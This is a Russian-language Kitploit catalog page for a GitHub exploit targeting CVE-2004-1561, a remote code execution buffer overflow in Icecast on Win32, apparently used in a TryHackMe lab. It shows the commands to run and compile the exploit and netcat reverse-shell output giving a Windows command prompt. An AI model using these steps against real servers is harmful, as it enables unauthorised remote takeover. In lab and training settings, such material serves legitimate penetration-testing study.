Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2004-1561 — Icecast: переполнение буфера при перезаписи заголовка (RCE) для версий < 2.0.1 (Win32) | Kitploit
Инструменты/GitHubGitHub/ivanitlearning/cve-2004-1561
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияШелл-кодТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubivanitlearning/cve-2004-1561

CVE-2004-1561

Icecast: переполнение буфера при перезаписи заголовка (RCE) для версий < 2.0.1 (Win32)

Репозиторий
72126 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2004-1561 Icecast Header Overwrite buffer overflow RCE < 2.0.1 (Win32)

Python 3 Icecast Header Overwrite buffer overflow RCE < 2.0.1 (Win32), переписанный из этого модуля Metasploit. Я переписал это из модуля Metasploit, потому что не смог заставить работать этот.

Использование:

Замените shellcode обратной оболочки в эксплойте, вызовите его с аргументом для удаленного сервера и порта.

root@Kali:~/TryHackme/Ice# ./icecast.py 192.168.92.133 8000

Done!

Прослушиватель обратной оболочки:

root@Kali:~/TryHackme/Ice# nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.92.128] from (UNKNOWN) [192.168.92.133] 49211
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Program Files (x86)\Icecast2 Win32>

Обновление для 568-edit.c

Удалось заставить работать оригинальный эксплойт. Отредактирован в соответствии с этим.

Использование для 568-edit.c

root@Kali:~/TryHackme/Ice# gcc 568-edit.c -o 568
root@Kali:~/TryHackme/Ice# ./568 192.168.92.133

Icecast <= 2.0.1 Win32 remote code execution 0.1
by Luigi Auriemma
e-mail: [email protected]
web:http://aluigi.altervista.org

shellcode add-on by Delikon
www.delikon.de

- target 192.168.92.133:8000
- send malformed data

Server IS vulnerable!!!

На прослушивателе:

root@Kali:~# nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.92.128] from (UNKNOWN) [192.168.92.133] 49238
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Program Files (x86)\Icecast2 Win32>

Скачать инструмент